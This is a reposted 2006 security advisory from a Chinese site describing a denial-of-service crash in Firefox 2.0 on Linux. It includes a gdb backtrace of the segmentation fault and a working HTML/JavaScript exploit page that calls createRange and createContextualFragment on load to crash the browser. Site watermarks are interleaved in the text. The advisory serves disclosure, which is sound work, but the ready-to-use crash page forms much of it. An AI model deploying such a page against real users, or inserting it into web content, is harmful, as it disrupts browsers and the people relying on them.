Firefox createRange Crash

2006-11-02 作者:网管整理来源:bitsCN.com 点评 投稿 收藏

Summary
Mozilla Firefox is a free, open source, cross-platform, graphical web browser developed by the Mozilla Corporation and hundreds of volunteers.

The latest version of Firefox is vulnerable to a denial of service vulnerability.

Credit:
The original article can be found at:
http://security-protocols.com/poc/ff2_death.html
Click here to get expert advice, live

Details
Vulnerable Systems:
* Firefox 2.0 on Linux

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1221474080 (LWP 31536)]
0x081d98ee in nsWritingIterator<unsigned short>::advance ()
(gdb) trace
trace command requires an argument
(gdb) backtrace
#0 0x081d98ee in nsWritingIterator<unsigned short>::advance ()
#1 0x083b4d8f in nsReadingIterator<unsigned short>::advance ()
#2 0xb7f2a39b in XPTC_InvokeByIndex () from /usr/lib/firefox2-manual/libxpcom_core.so
#3 0x080a6960 in nsTHashtable<nsBaseHashtableET<nsDepCharHashKey, nsAutoPtr<nsINIParser::INIValue> > >::~nsTHashtable () 网管网www_bitscn_com
#4 0x080ac53a in nsTHashtable<nsBaseHashtableET<nsDepCharHashKey, nsAutoPtr<nsINIParser::INIValue> > >::~nsTHashtable ()
#5 0xb7f86ed6 in js_Invoke () from /usr/lib/firefox2-manual/libmozjs.so
#6 0xb7f8b80d in js_Interpret () from /usr/lib/firefox2-manual/libmozjs.so
#7 0xb7f86f91 in js_Invoke () from /usr/lib/firefox2-manual/libmozjs.so
#8 0xb7f87374 in js_InternalInvoke () from /usr/lib/firefox2-manual/libmozjs.so
#9 0xb7f64854 in JS_CallFunctionValue () from /usr/lib/firefox2-manual/libmozjs.so
#10 0x0843dbb7 in nsReadingIterator<unsigned short>::advance ()
#11 0x0846b6d9 in nsReadingIterator<unsigned short>::advance ()
#12 0x083c9724 in nsReadingIterator<unsigned short>::advance ()
#13 0x083c9b4b in nsReadingIterator<unsigned short>::advance ()
#14 0x08442204 in nsReadingIterator<unsigned short>::advance ()
#15 0x0826f4e7 in XmlInitUnknownEncodingNS ()

PoC:
Following this link will crash your FireFox: 网管u家u.bitscn@com
http://security-protocols.com/poc/ff2_death.html

Exploit:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;
range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>

顶一下

TAGs：

上一篇：PrivateWire Gateway Buffer Overflow 下一篇：PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit

Firefox createRange Crash

2006-11-02 作者:网管整理 来源:bitsCN.com 点评 投稿 收藏

2006-11-02 作者:网管整理来源:bitsCN.com 点评投稿收藏